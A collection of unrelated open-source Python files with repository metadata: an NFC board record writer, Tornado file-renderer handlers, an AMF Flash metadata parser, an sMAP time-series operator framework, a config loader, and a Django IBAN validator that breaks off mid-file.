TextRecord : self._setTextRecord,
SmartPosterRecord : self._setSmartPosterRecord,
MIMERecord : self._setMIMERecord,
}
if( not spAllowed and type(record) == SmartPosterRecord ):
raise SmartPosterNestingException()
return funcs[type(record)](recordNumber, record, recordsStart)
def _setURIRecord(self, recordNumber, record, spRecordNumber):
#Try to get prefix
buf = array("B")
buf.fromstring(record.uri)
prefix, length = self._encodePrefix(buf[0:36])
self._setRecordData(recordNumber, 0, buf[length:])
return spRecordNumber
def _setTextRecord(self, recordNumber, record, spRecordNumber):
languageCodeBuf = array("B")
languageCodeBuf.fromstring(record.language)
textBuf = array("B")
textBuf.fromstring(record.text)
self._setRecordData(recordNumber, 0, languageCodeBuf)
self._setRecordData(recordNumber, 1, textBuf)
return spRecordNumber
def _setSmartPosterRecord(self, recordNumber, record, recordsStart):
spRecordNumber = recordsStart
for spRecord in record.records:
self._setNdefRecord(spRecordNumber, spRecord, 0, False) #No sub records
spRecordNumber += 1
return spRecordNumber
def _setMIMERecord(self, recordNumber, record, spRecordNumber):
mimeTypeBuf = array("B")
mimeTypeBuf.fromstring(record.mimeType)
dataBuf = array("B", record.data)
self._setRecordData(recordNumber, 0, mimeTypeBuf)
self._setRecordData(recordNumber, 1, dataBuf)
return spRecordNumber
def _encodePrefix(self, uri):
prefix, length = self._transport.nfcEncodePrefix(uri)
return prefix, length
def _setRecordData(self, recordNumber, item, itemData):
itemLength = len(itemData)
itemOff = 0
while itemOff < itemLength:
chunkLength = min(CHUNK_SIZE, itemLength - itemOff)
buf = array("B", itemData[itemOff:itemOff+chunkLength])
self._transport.nfcSetRecordData(recordNumber, item, itemOff, buf)
itemOff += chunkLength
|
{
"content_hash": "650c5f10749ccbeae43f0adb327cf9a4",
"timestamp": "",
"source": "github",
"line_count": 407,
"max_line_length": 201,
"avg_line_length": 35.1007371007371,
"alnum_prop": 0.6171776564468711,
"repo_name": "jautero/micronfcboard-python",
"id": "00c2f331a596ba4694c566f08a79dbdba9398877",
"size": "14286",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "micronfcboard/board.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "198570"
}
],
"symlink_target": ""
}
|
import os
import pkg_resources
import tornado.gen
import tornado.web
from raven.contrib.tornado import SentryMixin
import waterbutler.core.utils
import waterbutler.server.utils
import waterbutler.core.exceptions
from mfr.core import utils
from mfr.server import settings
from mfr.core import exceptions
CORS_ACCEPT_HEADERS = [
'Range',
'Content-Type',
'Authorization',
'Cache-Control',
'X-Requested-With',
]
CORS_EXPOSE_HEADERS = [
'Accept-Ranges',
'Content-Range',
'Content-Length',
'Content-Encoding',
]
class CorsMixin(tornado.web.RequestHandler):
def set_default_headers(self):
if isinstance(settings.CORS_ALLOW_ORIGIN, str):
self.set_header('Access-Control-Allow-Origin', settings.CORS_ALLOW_ORIGIN)
else:
if self.request.headers.get('Origin') in settings.CORS_ALLOW_ORIGIN:
self.set_header('Access-Control-Allow-Origin', self.request.headers['Origin'])
self.set_header('Access-Control-Allow-Headers', ', '.join(CORS_ACCEPT_HEADERS))
self.set_header('Access-Control-Expose-Headers', ', '.join(CORS_EXPOSE_HEADERS))
self.set_header('Cache-control', 'no-store, no-cache, must-revalidate, max-age=0')
def options(self):
self.set_status(204)
self.set_header('Access-Control-Allow-Methods', 'GET, PUT, POST, DELETE'),
class BaseHandler(CorsMixin, tornado.web.RequestHandler, SentryMixin):
@tornado.gen.coroutine
def prepare(self):
if self.request.method == 'OPTIONS':
return
self.url = self.request.query_arguments['url'][0].decode('utf-8')
self.provider = utils.make_provider(
settings.PROVIDER_NAME,
self.request,
self.url
)
self.metadata = yield from self.provider.metadata()
self.cache_provider = waterbutler.core.utils.make_provider(
settings.CACHE_PROVIDER_NAME,
{}, # User information which can be left blank
settings.CACHE_PROVIDER_CREDENTIALS,
settings.CACHE_PROVIDER_SETTINGS
)
self.local_cache_provider = waterbutler.core.utils.make_provider(
'filesystem', {}, {}, settings.LOCAL_CACHE_PROVIDER_SETTINGS
)
@tornado.gen.coroutine
def write_stream(self, stream):
while True:
chunk = yield from stream.read(settings.CHUNK_SIZE)
if not chunk:
break
self.write(chunk)
yield self.flush()
def write_error(self, status_code, exc_info):
self.captureException(exc_info) # Log all non 2XX codes to sentry
etype, exc, _ = exc_info
if issubclass(etype, exceptions.PluginError):
self.set_status(exc.code)
self.finish(exc.as_html())
else:
self.set_status(400)
self.finish('''
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<div class="alert alert-warning" role="alert">
Unable to render the requested file, please try again later.
</div>
''')
class ExtensionsStaticFileHandler(tornado.web.StaticFileHandler, CorsMixin):
"""Extensions static path definitions
"""
def initialize(self):
namespace = 'mfr.renderers'
module_path = 'mfr.extensions'
self.modules = {
ep.module_name.replace(module_path + '.', ''): os.path.join(ep.dist.location, 'mfr', 'extensions', ep.module_name.replace(module_path + '.', ''), 'static')
for ep in list(pkg_resources.iter_entry_points(namespace))
}
@tornado.gen.coroutine
def get(self, module_name, path):
try:
super().initialize(self.modules[module_name])
return (yield super().get(path))
except Exception:
self.set_status(404)
try:
super().initialize(settings.STATIC_PATH)
return (yield super().get(path))
except Exception:
self.set_status(404)
|
{
"content_hash": "fde555fb7df24617860d993a9165d5aa",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 167,
"avg_line_length": 31.7578125,
"alnum_prop": 0.6169741697416974,
"repo_name": "haoyuchen1992/modular-file-renderer",
"id": "160d236a06224617b6d90b76f841be1ad9437d1e",
"size": "4065",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "mfr/server/handlers/core.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "89314"
},
{
"name": "HTML",
"bytes": "28280"
},
{
"name": "Java",
"bytes": "3658258"
},
{
"name": "JavaScript",
"bytes": "938304"
},
{
"name": "Mako",
"bytes": "26171"
},
{
"name": "Python",
"bytes": "119293"
}
],
"symlink_target": ""
}
|
"""
AMF metadata (inside Flash video, FLV file) parser.
Documentation:
- flashticle: Python project to read Flash (formats SWF, FLV and AMF)
http://undefined.org/python/#flashticle
Author: Victor Stinner
Creation date: 4 november 2006
"""
from hachoir_core.field import (FieldSet, ParserError,
UInt8, UInt16, UInt32, PascalString16, Float64)
from hachoir_core.tools import timestampUNIX
def parseUTF8(parent):
yield PascalString16(parent, "value", charset="UTF-8")
def parseDouble(parent):
yield Float64(parent, "value")
def parseBool(parent):
yield UInt8(parent, "value")
def parseArray(parent):
yield UInt32(parent, "count")
for index in xrange(parent["count"].value):
yield AMFObject(parent, "item[]")
def parseObjectAttributes(parent):
while True:
item = Attribute(parent, "attr[]")
yield item
if item["key"].value == "":
break
def parseMixedArray(parent):
yield UInt32(parent, "count")
for index in xrange(parent["count"].value + 1):
item = Attribute(parent, "item[]")
yield item
if not item['key'].value:
break
def parseDate(parent):
yield Float64(parent, "timestamp_microsec")
yield UInt16(parent, "timestamp_sec")
def parseNothing(parent):
raise StopIteration()
class AMFObject(FieldSet):
CODE_DATE = 11
tag_info = {
# http://osflash.org/amf/astypes
0: (parseDouble, "Double"),
1: (parseBool, "Boolean"),
2: (parseUTF8, "UTF-8 string"),
3: (parseObjectAttributes, "Object attributes"),
#MOVIECLIP = '\x04',
#NULL = '\x05',
#UNDEFINED = '\x06',
#REFERENCE = '\x07',
8: (parseMixedArray, "Mixed array"),
9: (parseNothing, "End of object"),
10: (parseArray, "Array"),
CODE_DATE: (parseDate, "Date"),
#LONGUTF8 = '\x0c',
#UNSUPPORTED = '\x0d',
## Server-to-client only
#RECORDSET = '\x0e',
#XML = '\x0f',
#TYPEDOBJECT = '\x10',
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
code = self["type"].value
try:
self.parser, desc = self.tag_info[code]
if code == self.CODE_DATE:
self.createValue = self.createValueDate
except KeyError:
raise ParserError("AMF: Unable to parse type %s" % code)
def createFields(self):
yield UInt8(self, "type")
for field in self.parser(self):
yield field
def createValueDate(self):
value = (self["timestamp_microsec"].value * 0.001) \
- (self["timestamp_sec"].value * 60)
return timestampUNIX(value)
class Attribute(AMFObject):
def __init__(self, *args):
AMFObject.__init__(self, *args)
self._description = None
def createFields(self):
yield PascalString16(self, "key", charset="UTF-8")
yield UInt8(self, "type")
for field in self.parser(self):
yield field
def createDescription(self):
return 'Attribute "%s"' % self["key"].value
|
{
"content_hash": "ac559371bb6dbf5f9065132fdf44a104",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 70,
"avg_line_length": 28.463636363636365,
"alnum_prop": 0.5927818588310444,
"repo_name": "Yukinoshita47/Yuki-Chan-The-Auto-Pentest",
"id": "496c5c1d6c1c7bdb9e6c94edf5a424b364e870af",
"size": "3131",
"binary": false,
"copies": "94",
"ref": "refs/heads/master",
"path": "Module/metagoofil/hachoir_parser/video/amf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "36211"
},
{
"name": "JavaScript",
"bytes": "3038"
},
{
"name": "Makefile",
"bytes": "1360"
},
{
"name": "Perl",
"bytes": "108876"
},
{
"name": "Python",
"bytes": "3034585"
},
{
"name": "Roff",
"bytes": "6738"
},
{
"name": "Ruby",
"bytes": "2693582"
},
{
"name": "Shell",
"bytes": "53755"
},
{
"name": "XSLT",
"bytes": "5475"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2011, 2012, Regents of the University of California
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Stephen Dawson-Haggerty <stevedh@eecs.berkeley.edu>
"""
import uuid
import shelve
import operator
import datetime
import copy
import itertools
import numpy as np
from twisted.internet import reactor, threads
from twisted.python import log
from smap import driver, util, smapconf
from smap.core import SmapException
from smap.archiver.client import SmapClient, RepublishClient
from smap.contrib import dtutil
from twisted.spread import pb
from dateutil.tz import gettz
# null vector with the right shape so we can index into it
null = np.array([])
null = np.reshape(null, (0, 2))
def mknull(n):
a = np.array([])
return np.reshape(a, (0, n))
OP_N_TO_1 = 1
OP_N_TO_N = 2
class DataChunk(list):
"""Wrapper object holding raw time series data being processed
The chunk boundaries contains an (start, end) tuple of timestamps
"""
def __init__(self, region, first, last, *args, **kwargs):
# the time window being processed
self.region = region
# if this is the first and/or last chunk of data -- can be used to flush buffers
self.first, self.last = first, last
list.__init__(self, *args, **kwargs)
class Operator(object):
# data type of operator output
data_type = ('double', float)
required_tags = set(['uuid'])
optional_tags = set([])
block_streaming = False
def __init__(self, inputs,
outputs=OP_N_TO_1,
tags=None):
"""
:param inputs: list of uuids the operator examines
"""
self.inputs = inputs
self.tags = tags
self._has_pending = False
self._pending = [null] * len(inputs)
uuids = map(operator.itemgetter('uuid'), inputs)
# auto-construct output ids if requested
if outputs == OP_N_TO_1:
self.outputs = [util.dict_all(inputs)]
self.outputs[0]['uuid'] = reduce(lambda x, y: str(uuid.uuid5(y, x)),
map(uuid.UUID, sorted(uuids)),
self.name)
elif outputs == OP_N_TO_N:
self.outputs = copy.deepcopy(inputs)
for i, uid in enumerate(map(lambda x: str(uuid.uuid5(x, self.name)),
map(uuid.UUID, uuids))):
self.outputs[i]['uuid'] = uid
else:
self.outputs = copy.deepcopy(outputs)
def index(self, streamid):
for i in xrange(0, len(self.inputs)):
if self.inputs[i]['uuid'] == streamid:
return i
return None
# @name.setter
# def _get_name(self):
# """Return a stringified name for the operator"""
# if self._name:
# raise NotImplementedError()
# else:
# return self._name
# @name.
def __call__(self, input, **kwargs):
if not isinstance(input, DataChunk):
input = DataChunk((None, None), False, False, input)
return self.process(input, **kwargs)
def reset(self):
"""Reset the internal state to discard any changes made"""
raise NotImplementedError()
def process(self, recs):
"""Process a number of records in bulk
:param list recs: a list of (timestamp, value) tuples
:return list: a list of (timestamp, value) """
raise NotImplementedError()
def _push(self, stream, data, stream_idx=None):
"""Insert data for a single stream"""
if not stream_idx: stream_idx = self.index(stream)
self._pending[stream_idx] = data
self._has_pending = True
def _process(self):
"""Deliver all waiting data."""
if self._has_pending:
rv = self.process(self._pending)
self._pending = [null] * len(self.inputs)
self._has_pending = False
return rv
else:
return [null] * len(self.inputs)
def __str__(self):
return self.name
class OperatorDriver(driver.SmapDriver):
"""Base class for code which wants to process single streams.
To do this you should:
a) implement an :py:class:`Operator`, which contains your
specific logic. You should at least override name() to provide
a human-readable name for your operator, and and bulk() which
processes chunks of data..
b) subclass OperatorDriver, implementing a "setup" method which
creates operators and adds them using :py:method:`add_operator`.
Make sure you call OperatorDriver.setup.
If you do this, you'll be able to use your operator both in
real-time mode (via a twistd smap source) and to run on historical
data, using `smap-load` to load source data and pipe it through
operators.
"""
load_xsec_size = 200
def add_operator(self, path, op, inherit_metadata=False):
"""Add an operator to the driver
"""
if len(op.outputs) != 1 or not 'Properties/UnitofMeasure' in op.outputs[0]:
raise SmapException("Can only add operators with a single output!")
opid = op.outputs[0]['uuid']
unit = op.outputs[0]['Properties/UnitofMeasure']
if not isinstance(opid, uuid.UUID):
opid = uuid.UUID(opid)
self.add_timeseries(path, opid, unit,
data_type=op.data_type[0],
milliseconds=False)
self.set_metadata(path, {
'Extra/SourceStream' : \
','.join(map(operator.itemgetter('uuid'), op.inputs)),
'Extra/Operator' : str(op.name)
})
if inherit_metadata:
self.set_metadata(path, op.outputs[0])
for source in op.inputs:
source = source['uuid']
if not source in self.operators:
self.operators[source] = {}
if not opid in self.operators[source]:
self.operators[source][opid] = (path, op)
self.oplist.append((path, op))
def reset(self):
"""Reset all operators"""
for oplist in self.operators.itervalues():
for path, op in oplist.itervalues():
op.reset()
def _data(self, uuids, newdata, process=True):
"""Process incoming data by pushing it through the operators
process: don't actually process the operators, just add the
pending data.
"""
# print "_data", len(newdata)
pushlist = set([])
for source_id, data in zip(uuids, newdata):
if not source_id in self.operators:
continue
# prepare the data
if len(data) == 0:
data = np.reshape(data, (0, 2))
# push all data through the appropriate operators
for addpath, op in self.operators[source_id].itervalues():
op._push(source_id, data)
pushlist.add((addpath, op))
if not process: return
pushlist = list(pushlist)
pushlist.sort(key=lambda x: x[0])
for addpath, op in pushlist:
new = op._process()
for newv in new[0]:
ts, v = int(newv[0]), op.data_type[1](newv[1])
self._add(addpath, ts / 1000, v)
def setup(self, opts, restrict=None, shelveoperators=False, cache=True, raw=False):
self.load_chunk_size = datetime.timedelta(hours=int(opts.get('ChunkSize', 24)))
self.source_url = opts.get('SourceUrl', 'http://new.openbms.org/backend')
# self.source_url = opts.get('SourceUrl', 'http://ar1.openbms.org:8079')
if not raw and restrict:
self.restrict = '(' + restrict + ') and not has Metadata/Extra/Operator'
else:
self.restrict = restrict
if shelveoperators:
self.operators = shelve.open(opts.get('OperatorCache', '.operators'),
protocol=2, writeback=True)
# sync the operator state periodically and at exit
util.periodicCallInThread(self.operators.sync).start(60)
reactor.addSystemEventTrigger('after', 'shutdown',
self.operators.close)
else:
self.operators = {}
self.oplist = []
self.arclient = SmapClient(self.source_url)
self.cache = cache
# create timeseries from cached operator state
for sid, oplist in self.operators.iteritems():
for path, op in oplist.itervalues():
self.add_operator(path, op)
def start(self):
"""Start receiving real-time data when used in daemon mode"""
# set up clients to provide the data
source = [
'http://ar1.openbms.org:8079',
'http://ar2.openbms.org:8079']
self.clients = []
for url in source:
self.clients.append(RepublishClient(url, self._data,
restrict=self.restrict))
self.clients[-1].connect()
def load(self, start_dt, end_dt, cache=True):
"""Load a range of time by pulling it from the database and
pushing it through the operators"""
self.load_uids = self.operators.keys()
self.start_dt, self.end_dt = start_dt, end_dt
self.cache = cache
return self.load_time_chunk(self)
def load_time_chunk(self, *args):
if self.start_dt >= self.end_dt:
return None
self.load_offset = 0
return self.load_crossection()
def load_crossection(self, *args):
start = self.start_dt
end = self.start_dt + self.load_chunk_size
if end > self.end_dt: end = self.end_dt
log.msg("loading " + str(self.load_offset) + " " +
str(start) + ' - ' + str(end))
start, end = dtutil.dt2ts(start), \
dtutil.dt2ts(end)
d = threads.deferToThread(self.arclient.data_uuid,
self.load_uids[self.load_offset:
self.load_offset +
self.load_xsec_size],
start, end,
self.cache)
d.addCallback(self.load_data, self.load_offset)
d.addCallback(lambda _: (self._flush(), None))
self.load_offset += self.load_xsec_size
if self.load_offset >= len(self.load_uids):
# pick a new window
self.start_dt += self.load_chunk_size
d.addCallback(self.load_time_chunk)
else:
d.addCallback(self.load_crossection)
def err(e):
print e
d.addErrback(err)
return d
def load_data(self, data, offset):
uuids = self.load_uids[offset:offset+self.load_xsec_size]
self._data(uuids, data)
class GroupedOperatorDriver(OperatorDriver):
"""Driver which selects streams using a `Restrict` tag selector,
and groups them according to a `Group` tagname.` It runs one
operator per group, and send data from each stream to the proper
operator.
Make self.operator_class a staticmethod which instantiates a new
operator.
"""
operator_class = None
def setup(self, opts):
self.restrict = opts.get("Restrict")
self.group = opts.get("Group")
self.opstr = opts.get("Operator")
OperatorDriver.setup(self, opts, self.restrict, shelveoperators=False)
# look up the streams, units, and group tags.
client = SmapClient()
streams = client.tags(self.restrict, '*')
# 'uuid, Properties/UnitofMeasure, Metadata/SourceName, %s' %
# self.group)
#print streams
groupitems = {}
# find the groups
for s in streams:
if not s[self.group] in groupitems:
groupitems[s[self.group]] = []
groupitems[s[self.group]].append(s)
# instantiate one operator per group with the appropriate inputs
for group, tags in groupitems.iteritems():
inputs = map(operator.itemgetter('uuid'), tags)
op = self.operator_class(tags)
path = '/' + util.str_path(group)
self.add_operator(path, op)
##############################################################################
##
## Operators for the framework
##
##############################################################################
def extend(a1, a2):
"""Extend data vector a1 with vector a2"""
assert(len(a1) == len(a2))
rv = [None] * len(a1)
for i in xrange(0, len(a2)):
if a1[i].shape[0] == 0:
rv[i] = a2[i]
elif len(a2[i]):
rv[i] = np.vstack((a1[i], a2[i]))
else:
rv[i] = a1[i]
return rv
def join_intersect(inputs, last=None):
"""Join together streams based on timestamps, throwing out places
where they do not overlap"""
times = reduce(lambda x, y: np.intersect1d(x, y[:,0]), inputs)
vals = map(lambda x: x[np.nonzero(np.in1d(x[:,0], times)), :][0]
if len(x) else null, inputs)
return vals
def join_union(inputs):
"""Join together streams based on timestamps, including all data
and inserting np.nan for missing values into each stream"""
if len(inputs) == 1: return inputs
times = reduce(lambda x, y: np.union1d(x, y[:, 0]), inputs[1:],
inputs[0][:, 0])
times = np.reshape(times, (len(times), 1))
rv = []
for stream in inputs:
new = np.column_stack((times,
np.ones((len(times), stream.shape[1] - 1)) * np.nan))
if stream.shape[0] > 0:
new[np.nonzero(np.in1d(times, stream[:, 0])), 1:] = stream[:, 1:]
rv.append(new)
return rv
def transpose_streams(inputs):
"""Takes aligned inputs and returns a matrix with t, v1, v2, ... vN"""
data = np.hstack(map(lambda x: x[:, 1:], inputs))
return np.vstack((inputs[0][:, 0], data.T)).T
class ParallelSimpleOperator(Operator):
"""Parent class for operators which can be applied separately to
each stream. Create a staticmethod called `base_operator` which
performs the appropriate operation when called on a single stream
Any keyword args will be passed to this classmethod on invocation;
it needs to have a special form: it should take as an argument a
data vector, and return a (result, kwarg) tuple. The tuple will
be passed to the operator on the next invocation.
"""
def __init__(self, inputs, **initargs):
Operator.__init__(self, inputs, outputs=OP_N_TO_N)
self.op = parallelize(self.base_operator,
len(inputs),
**initargs)
def process(self, input, **kwargs):
return self.op(input, **kwargs)
class parallelize(object):
def __init__(self, operator, n, *opargs, **initargs):
self.operator = operator
self.n = n
self.opargs = opargs
self.state = [initargs] * n
def __call__(self, inputs):
rv = [None] * self.n
assert self.n == len(inputs)
for i in xrange(0, self.n):
opdata = self.operator(inputs[i], *self.opargs, **self.state[i])
if isinstance(opdata, tuple):
rv[i], self.state[i] = opdata
else:
rv[i] = opdata
return rv
class VectorOperator(Operator):
"""Base class for operators which can work on either axis.
It will automatically allow you to apply your operator either
across streams or across all data from separate streams in
parallel. If the operator can operate on multiple vectors in
parallel (a la many numpy operators), the base operator should
have the 'parallel' attribute set on it.
The operators may either return just a numpy array as a result, or
a (result, state) tuple; the state gets passed as kwargs on the
next execution.
This style of operator is only useful over a finite time period,
so as the inner operator of a windowing operator or to answer a
query like "max" or "min" over a date range.
"""
name = 'vector operator'
def __init__(self, inputs, *opargs, **initargs):
self.axis = 0 if initargs.get('axis', 'time') in ['time', 0] else 1
initargs['axis'] = self.axis
self.name = "%s(%s)" % (self.name,
",".join(list(map(str, opargs)) +
map(lambda (k, v): str(k) + "=" + str(v),
initargs.iteritems())))
# if we operate in parallel then we also produce n output
# operators
outputs = OP_N_TO_N
self.block_streaming = (self.axis == 0)
self.op = parallelize(self.base_operator,
len(inputs),
*opargs,
**initargs)
Operator.__init__(self, inputs, outputs=outputs)
def process(self, inputs):
return self.op(inputs)
class CompositionOperator(Operator):
"""Set an oplist property of a class instance of this, or a
subclass The oplist should be a list of operator constructors;
when passed in data, this class will chain the operators together
and become an operator of their compsition.
"""
def __init__(self, inputs):
self.ops = []
_inputs = inputs
for opclass in self.oplist:
op = opclass(_inputs)
self.ops.append(op)
_inputs = op.outputs
self.required_tags = set.union(*map(lambda x: x.required_tags, self.ops))
self.optional_tags = set.union(*map(lambda x: x.optional_tags, self.ops))
self.block_streaming = reduce(operator.__or__,
map(operator.attrgetter('block_streaming'), self.ops))
Operator.__init__(self, inputs, _inputs)
def process(self, data):
return reduce(lambda x, y: y(x), self.ops, data)
def __str__(self):
return ' < '.join(map(str, reversed(self.ops)))
def make_composition_operator(ops):
class _TmpOp(CompositionOperator):
name = 'none'
oplist = ops
return _TmpOp
|
{
"content_hash": "fd69d7d594ef42b2f3b6dc989ab4a469",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 92,
"avg_line_length": 36.48148148148148,
"alnum_prop": 0.5818781725888325,
"repo_name": "samboiki/smap-data",
"id": "9ac2248d2cdc547f04a38c35997f7b4bb30d29e5",
"size": "19700",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python/smap/operators.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "301328"
},
{
"name": "HTML",
"bytes": "7902"
},
{
"name": "Makefile",
"bytes": "5268"
},
{
"name": "Python",
"bytes": "1394465"
},
{
"name": "R",
"bytes": "23461"
},
{
"name": "Shell",
"bytes": "1273"
},
{
"name": "TeX",
"bytes": "40212"
},
{
"name": "XSLT",
"bytes": "5081"
}
],
"symlink_target": ""
}
|
import os
import geoip2.database
from ConfigParser import SafeConfigParser
from flask.helpers import find_package
from rfk.exc.base import NoConfigException
CONFIG = SafeConfigParser()
geoip = None
def init(enable_geoip=True):
global geoip
prefix, package_path = find_package(__name__)
config_locations = []
if prefix is not None:
config_locations.append(os.path.join(prefix, 'local', 'etc', 'rfk-config.cfg'))
config_locations.append(os.path.join(prefix, 'etc', 'rfk-config.cfg'))
config_locations.append(os.path.join(prefix, 'rfk-config.cfg'))
if package_path is not None:
config_locations.append(os.path.join(package_path, 'rfk', 'rfk-config.cfg'))
succ_read = CONFIG.read(config_locations)
if len(succ_read) == 0:
raise NoConfigException()
if enable_geoip:
geoip = geoip2.database.Reader(CONFIG.get('site', 'geoipdb'))
|
{
"content_hash": "549f4c019a1406a22ed7735d702080c3",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 87,
"avg_line_length": 32.464285714285715,
"alnum_prop": 0.6908690869086909,
"repo_name": "buckket/weltklang",
"id": "3a6be6f2d87a93b37f085623aa5736f7954fe405",
"size": "909",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/rfk/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "42171"
},
{
"name": "HTML",
"bytes": "217875"
},
{
"name": "JavaScript",
"bytes": "24784"
},
{
"name": "Makefile",
"bytes": "90"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "278815"
},
{
"name": "Shell",
"bytes": "263"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
import string
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.utils.deconstruct import deconstructible
from django.utils.translation import ugettext_lazy as _
from . import checksums
from .countries.iso_3166 import ISO_3166_1_ALPHA2_COUNTRY_CODES
# Dictionary of ISO country code to IBAN length.
#
# The official IBAN Registry document is the best source for up-to-date information about IBAN formats and which
# countries are in IBAN.
#
# https://www.swift.com/standards/data-standards/iban
#
# The IBAN_COUNTRY_CODE_LENGTH dictionary has been updated version 64 of the IBAN Registry document which was published
# in March 2016.
#
# Other Resources:
#
# https://en.wikipedia.org/wiki/International_Bank_Account_Number#IBAN_formats_by_country
# http://www.ecbs.org/iban/france-bank-account-number.html
# https://www.nordea.com/V%C3%A5ra+tj%C3%A4nster/Internationella+produkter+och+tj%C3%A4nster/Cash+Management/IBAN+countries/908472.html
IBAN_COUNTRY_CODE_LENGTH = {'AL': 28, # Albania
'AD': 24, # Andorra
'AE': 23, # United Arab Emirates
'AT': 20, # Austria
'AZ': 28, # Azerbaijan
'BA': 20, # Bosnia and Herzegovina
'BE': 16, # Belgium
'BG': 22, # Bulgaria
'BH': 22, # Bahrain
'BR': 29, # Brazil
'CH': 21, # Switzerland
'CR': 21, # Costa Rica
'CY': 28, # Cyprus
'CZ': 24, # Czech Republic
'DE': 22, # Germany
'DK': 18, # Denmark
'DO': 28, # Dominican Republic
'EE': 20, # Estonia
'ES': 24, # Spain
'FI': 18, # Finland
'FO': 18, # Faroe Islands
'FR': 27, # France + Central African Republic, French Guiana, French Polynesia, Guadeloupe,
# Martinique, Réunion, Saint-Pierre and Miquelon, New Caledonia,
# Wallis and Futuna
'GB': 22, # United Kingdom + Guernsey, Isle of Man, Jersey
'GE': 22, # Georgia
'GI': 23, # Gibraltar
'GL': 18, # Greenland
'GR': 27, # Greece
'GT': 28, # Guatemala
'HR': 21, # Croatia
'HU': 28, # Hungary
'IE': 22, # Ireland
'IL': 23, # Israel
'IS': 26, # Iceland
'IT': 27, # Italy
'JO': 30, # Jordan
'KZ': 20, # Kazakhstan
'KW': 30, # Kuwait
'LB': 28, # Lebanon
'LC': 32, # Saint Lucia
'LI': 21, # Liechtenstein
'LT': 20, # Lithuania
'LU': 20, # Luxembourg
'LV': 21, # Latvia
'MC': 27, # Monaco
'MD': 24, # Moldova
'ME': 22, # Montenegro
'MK': 19, # Macedonia
'MT': 31, # Malta
'MR': 27, # Mauritania
'MU': 30, # Mauritius
'NL': 18, # Netherlands
'NO': 15, # Norway
'PS': 29, # Palestine
'PK': 24, # Pakistan
'PL': 28, # Poland
'PT': 25, # Portugal + Sao Tome and Principe
'QA': 29, # Qatar
'RO': 24, # Romania
'RS': 22, # Serbia
'SA': 24, # Saudi Arabia
'SC': 31, # Seychelles
'SE': 24, # Sweden
'SI': 19, # Slovenia
'SK': 24, # Slovakia
'SM': 27, # San Marino
'ST': 25, # Sao Tome And Principe
'TL': 23, # Timor-Leste
'TN': 24, # Tunisia
'TR': 26, # Turkey
'UA': 29, # Ukraine
'VG': 24, # British Virgin Islands
'XK': 20} # Republic of Kosovo (user-assigned country code)
# Nordea has catalogued IBANs for some additional countries but they are not part of the office IBAN network yet.
#
# Reference:
# https://www.nordea.com/V%C3%A5ra+tj%C3%A4nster/Internationella+produkter+och+tj%C3%A4nster/Cash+Management/IBAN+countries/908472.html
NORDEA_COUNTRY_CODE_LENGTH = {'AO': 25, # Angola
'BJ': 28, # Benin
'BF': 27, # Burkina Faso
'BI': 16, # Burundi
'CI': 28, # Ivory Coast
'CG': 27, # Congo
'CM': 27, # Cameroon
'CV': 25, # Cape Verde
'DZ': 24, # Algeria
'EG': 27, # Egypt
'GA': 27, # Gabon
'IR': 26, # Iran
'MG': 27, # Madagascar
'ML': 28, # Mali
'MZ': 25, # Mozambique
'SN': 28} # Senegal
@deconstructible
class IBANValidator(object):
""" A validator for International Bank Account Numbers (IBAN - ISO 13616-1:2007). """
def __init__(self, use_nordea_extensions=False, include_countries=None):
self.use_nordea_extensions = use_nordea_extensions
self.include_countries = include_countries
self.validation_countries = IBAN_COUNTRY_CODE_LENGTH.copy()
if self.use_nordea_extensions:
self.validation_countries.update(NORDEA_COUNTRY_CODE_LENGTH)
if self.include_countries:
for country_code in self.include_countries:
if country_code not in self.validation_countries:
msg = 'Explicitly requested country code %s is not part of the configured IBAN validation set.' % country_code
raise ImproperlyConfigured(msg)
def __eq__(self, other):
return (self.use_nordea_extensions == other.use_nordea_extensions and
self.include_countries == other.include_countries)
@staticmethod
def iban_checksum(value):
